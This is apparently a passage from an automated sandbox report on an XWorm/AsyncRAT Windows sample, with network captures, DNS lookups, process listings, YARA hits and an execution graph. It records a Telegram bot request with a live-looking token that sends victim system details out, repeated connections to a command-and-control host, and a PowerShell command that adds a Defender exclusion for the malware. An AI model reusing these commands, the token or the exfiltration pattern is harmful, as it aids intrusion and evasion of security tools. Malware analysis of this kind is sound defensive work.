                                                            Sep 25, 2024 11:32:05.721384048 CEST4972855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:05.958647966 CEST4972855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:05.960108042 CEST4972955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:05.963970900 CEST5520249728147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:05.965178013 CEST5520249729147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:05.965363979 CEST4972955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:05.984715939 CEST4972955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:05.989753008 CEST5520249729147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:08.606151104 CEST5520249729147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:08.606271982 CEST4972955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:08.740175009 CEST4972955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:08.742140055 CEST4973055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:08.745157003 CEST5520249729147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:08.747072935 CEST5520249730147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:08.747167110 CEST4973055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:08.770780087 CEST4973055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:09.067872047 CEST4973055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:09.090765953 CEST5520249730147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:09.090780020 CEST5520249730147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:11.401711941 CEST5520249730147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:11.402005911 CEST4973055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:11.411686897 CEST4973055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:11.412827015 CEST4973155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:11.416541100 CEST5520249730147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:11.417701006 CEST5520249731147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:11.417812109 CEST4973155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:11.436507940 CEST4973155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:11.441435099 CEST5520249731147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:14.069950104 CEST5520249731147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:14.070028067 CEST4973155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:18.115139961 CEST4973155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:18.118649006 CEST4973255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:18.120210886 CEST5520249731147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:18.123541117 CEST5520249732147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:18.125276089 CEST4973255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:18.151263952 CEST4973255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:18.156111002 CEST5520249732147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:20.854033947 CEST5520249732147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:20.854100943 CEST4973255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:23.208796978 CEST4973255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:23.213385105 CEST4973455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:23.236368895 CEST5520249732147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:23.236393929 CEST5520249734147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:23.236514091 CEST4973455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:23.260073900 CEST4973455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:23.269987106 CEST5520249734147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:23.446645021 CEST4973455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:23.452833891 CEST5520249734147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:25.906138897 CEST5520249734147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:25.906243086 CEST4973455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:28.724297047 CEST4973455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:28.728441000 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:28.729226112 CEST5520249734147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:28.733421087 CEST5520249735147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:28.733570099 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:28.752202034 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:28.758114100 CEST5520249735147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:30.427637100 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:30.432666063 CEST5520249735147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:31.394098043 CEST5520249735147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:31.394182920 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:33.817378044 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:33.840027094 CEST4973655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:34.130409956 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:34.663595915 CEST5520249735147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:34.663614035 CEST5520249736147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:34.663621902 CEST5520249735147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:34.663781881 CEST4973655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:34.663789034 CEST4973555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:34.679335117 CEST4973655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:34.879426956 CEST5520249736147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:37.302613974 CEST4973655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:37.307425976 CEST5520249736147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:37.550189018 CEST5520249736147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:37.550237894 CEST4973655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.052278996 CEST4973655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.055078030 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.057303905 CEST5520249736147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:40.060539007 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:40.060622931 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.089401960 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.094293118 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:40.115319967 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.120138884 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:40.130875111 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.135752916 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:40.146128893 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:40.150947094 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:42.721107960 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:42.721214056 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.208827972 CEST4973755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.213171005 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.213871956 CEST5520249737147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:45.218004942 CEST5520249738147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:45.218076944 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.244297028 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.249192953 CEST5520249738147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:45.365098000 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.369993925 CEST5520249738147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:45.396491051 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:45.402087927 CEST5520249738147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:47.899861097 CEST5520249738147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:47.899926901 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:50.411915064 CEST4973855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:50.414380074 CEST4973955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:50.418860912 CEST5520249738147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:50.421051025 CEST5520249739147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:50.421518087 CEST4973955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:50.438819885 CEST4973955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:50.445888042 CEST5520249739147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:53.079050064 CEST5520249739147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:53.079174995 CEST4973955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:55.568275928 CEST4973955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:55.571341991 CEST4974055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:55.573426008 CEST5520249739147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:55.576147079 CEST5520249740147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:55.576212883 CEST4974055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:55.598849058 CEST4974055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:55.603832960 CEST5520249740147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:58.401227951 CEST5520249740147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:58.401319027 CEST4974055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:00.614850044 CEST4974055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:00.619465113 CEST4974155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:00.619785070 CEST5520249740147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:00.624572039 CEST5520249741147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:00.628967047 CEST4974155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:00.651256084 CEST4974155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:00.656306982 CEST5520249741147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:03.300522089 CEST5520249741147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:03.300600052 CEST4974155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:05.771308899 CEST4974155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:05.774065971 CEST4974255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:05.776264906 CEST5520249741147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:05.779004097 CEST5520249742147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:05.779110909 CEST4974255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:05.799491882 CEST4974255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:05.804430962 CEST5520249742147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:08.435267925 CEST5520249742147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:08.435367107 CEST4974255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:10.943422079 CEST4974255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:10.946576118 CEST4974355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:10.949453115 CEST5520249742147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:10.952765942 CEST5520249743147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:10.952913046 CEST4974355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:10.968453884 CEST4974355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:10.974857092 CEST5520249743147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:13.610908031 CEST5520249743147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:13.610976934 CEST4974355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:16.130434990 CEST4974355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:16.132240057 CEST4974455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:16.136033058 CEST5520249743147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:16.137073994 CEST5520249744147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:16.137146950 CEST4974455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:16.154118061 CEST4974455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:16.158921003 CEST5520249744147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:18.830730915 CEST5520249744147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:18.830851078 CEST4974455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:35.046257973 CEST4974455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:35.049777031 CEST4975655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:35.051552057 CEST5520249744147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:35.054660082 CEST5520249756147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:35.054747105 CEST4975655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:35.071841955 CEST4975655202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:33:35.076670885 CEST5520249756147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:33:35.778263092 CEST4975655202192.168.2.5147.185.221.22

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 25, 2024 11:31:07.759073019 CEST5645853192.168.2.51.1.1.1
                                                            Sep 25, 2024 11:31:07.765974045 CEST53564581.1.1.1192.168.2.5
                                                            Sep 25, 2024 11:31:09.120835066 CEST6049053192.168.2.51.1.1.1
                                                            Sep 25, 2024 11:31:09.152991056 CEST53604901.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 25, 2024 11:31:07.759073019 CEST192.168.2.51.1.1.10x2a76Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 11:31:09.120835066 CEST192.168.2.51.1.1.10x9faeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 25, 2024 11:31:07.765974045 CEST1.1.1.1192.168.2.50x2a76No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 11:31:09.152991056 CEST1.1.1.1192.168.2.50x9faeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.telegram.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549708149.154.167.2204436552C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 09:31:08 UTC446OUTGET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 09:31:08 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 25 Sep 2024 09:31:08 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 428
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-09-25 09:31:08 UTC428INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 33 34 32 31 35 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 6f 67 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 69 74 79 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 39 38 35 30 38 38 38 38 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 2e 2e 2e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 69 74 79 30 7a 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 32 35 36 36 36 38 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 56 35 2e 34 5d 5c 6e 5c 6e 4e
                                                            Data Ascii: {"ok":true,"result":{"message_id":970,"from":{"id":7503421576,"is_bot":true,"first_name":"logz","username":"obilityBot"},"chat":{"id":985088883,"first_name":"....","username":"obility0z","type":"private"},"date":1727256668,"text":"\u2620 [XWorm V5.4]\n\nN


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:05:31:02
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                                                            Imagebase:0x230000
                                                            File size:434'176 bytes
                                                            MD5 hash:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:05:31:03
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                                                            Imagebase:0xa40000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:05:31:03
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                                                            Imagebase:0x370000
                                                            File size:434'176 bytes
                                                            MD5 hash:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:05:31:03
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                                                            Imagebase:0xa50000
                                                            File size:434'176 bytes
                                                            MD5 hash:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:05:31:03
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:05:31:05
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff6ef0c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:05:33:19
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128
                                                            Imagebase:0x210000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:168
                                                              Total number of Limit Nodes:6
                                                              execution_graph 25815 9dd478 25816 9dd4be 25815->25816 25820 9dd658 25816->25820 25823 9dd647 25816->25823 25817 9dd5ab 25827 9db7d0 25820->25827 25824 9dd658 25823->25824 25825 9db7d0 DuplicateHandle 25824->25825 25826 9dd686 25825->25826 25826->25817 25828 9dd6c0 DuplicateHandle 25827->25828 25829 9dd686 25828->25829 25829->25817 25932 9d4668 25933 9d467a 25932->25933 25934 9d4686 25933->25934 25938 9d4779 25933->25938 25943 9d4210 25934->25943 25936 9d46a5 25939 9d479d 25938->25939 25947 9d4879 25939->25947 25951 9d4888 25939->25951 25944 9d421b 25943->25944 25959 9d5c78 25944->25959 25946 9d708d 25946->25936 25948 9d4888 25947->25948 25949 9d498c 25948->25949 25955 9d44d4 25948->25955 25949->25949 25952 9d48af 25951->25952 25953 9d498c 25952->25953 25954 9d44d4 CreateActCtxA 25952->25954 25953->25953 25954->25953 25956 9d5918 CreateActCtxA 25955->25956 25958 9d59db 25956->25958 25960 9d5c83 25959->25960 25963 9d5c98 25960->25963 25962 9d7135 25962->25946 25964 9d5ca3 25963->25964 25967 9d5cc8 25964->25967 25966 9d721a 25966->25962 25968 9d5cd3 25967->25968 25969 9d5cf8 2 API calls 25968->25969 25970 9d730d 25969->25970 25970->25966 25971 85d01c 25972 85d034 25971->25972 25973 85d08e 25972->25973 25978 4bb1a99 25972->25978 25983 4bb2808 25972->25983 25988 4bb2818 25972->25988 25993 4bb1aa8 25972->25993 25979 4bb1ace 25978->25979 25981 4bb2818 2 API calls 25979->25981 25982 4bb2808 2 API calls 25979->25982 25980 4bb1aef 25980->25973 25981->25980 25982->25980 25984 4bb2818 25983->25984 25985 4bb2877 25984->25985 25998 4bb2da8 25984->25998 26003 4bb2d88 25984->26003 25989 4bb2845 25988->25989 25990 4bb2877 25989->25990 25991 4bb2da8 2 API calls 25989->25991 25992 4bb2d88 2 API calls 25989->25992 25991->25990 25992->25990 25994 4bb1ace 25993->25994 25996 4bb2818 2 API calls 25994->25996 25997 4bb2808 2 API calls 25994->25997 25995 4bb1aef 25995->25973 25996->25995 25997->25995 26000 4bb2dbc 25998->26000 25999 4bb2e48 25999->25985 26008 4bb2e60 26000->26008 26011 4bb2e50 26000->26011 26005 4bb2da8 26003->26005 26004 4bb2e48 26004->25985 26006 4bb2e60 2 API calls 26005->26006 26007 4bb2e50 2 API calls 26005->26007 26006->26004 26007->26004 26009 4bb2e71 26008->26009 26015 4bb4022 26008->26015 26009->25999 26012 4bb2e60 26011->26012 26013 4bb4022 2 API calls 26012->26013 26014 4bb2e71 26012->26014 26013->26014 26014->25999 26019 4bb4050 26015->26019 26023 4bb4040 26015->26023 26016 4bb403a 26016->26009 26020 4bb4092 26019->26020 26022 4bb4099 26019->26022 26021 4bb40ea CallWindowProcW 26020->26021 26020->26022 26021->26022 26022->26016 26024 4bb4050 26023->26024 26025 4bb40ea CallWindowProcW 26024->26025 26026 4bb4099 26024->26026 26025->26026 26026->26016 25830 4bb7df0 25831 4bb7e1d 25830->25831 25842 4bb7858 25831->25842 25835 4bb7e70 25836 4bb7858 2 API calls 25835->25836 25837 4bb7f9c 25836->25837 25838 4bb7858 2 API calls 25837->25838 25839 4bb7fce 25838->25839 25840 4bb7858 2 API calls 25839->25840 25841 4bb8064 25840->25841 25843 4bb7863 25842->25843 25844 4bb7e3e 25843->25844 25851 4bb7a7c 25843->25851 25846 4bb7868 25844->25846 25847 4bb7873 25846->25847 25849 9d8348 2 API calls 25847->25849 25850 9d5cf8 2 API calls 25847->25850 25848 4bb99dc 25848->25835 25849->25848 25850->25848 25852 4bb7a87 25851->25852 25856 9d8348 25852->25856 25861 9d5cf8 25852->25861 25853 4bb922c 25853->25844 25858 9d8358 25856->25858 25857 9d8649 25857->25853 25858->25857 25866 9dcdb0 25858->25866 25871 9dcda0 25858->25871 25863 9d5d03 25861->25863 25862 9d8649 25862->25853 25863->25862 25864 9dcdb0 2 API calls 25863->25864 25865 9dcda0 2 API calls 25863->25865 25864->25862 25865->25862 25867 9dcdd1 25866->25867 25868 9dcdf5 25867->25868 25876 9dcf4f 25867->25876 25880 9dcf60 25867->25880 25868->25857 25872 9dcdb0 25871->25872 25873 9dcdf5 25872->25873 25874 9dcf4f 2 API calls 25872->25874 25875 9dcf60 2 API calls 25872->25875 25873->25857 25874->25873 25875->25873 25877 9dcf60 25876->25877 25878 9dcfa7 25877->25878 25884 9db7c0 25877->25884 25878->25868 25882 9dcf6d 25880->25882 25881 9dcfa7 25881->25868 25882->25881 25883 9db7c0 2 API calls 25882->25883 25883->25881 25885 9db7cb 25884->25885 25887 9ddcb8 25885->25887 25888 9dd0c4 25885->25888 25887->25887 25889 9dd0cf 25888->25889 25890 9d5cf8 2 API calls 25889->25890 25891 9ddd27 25890->25891 25894 9dfaa8 25891->25894 25892 9ddd61 25892->25887 25895 9dfae5 25894->25895 25896 9dfad9 25894->25896 25895->25892 25896->25895 25899 4bb09b0 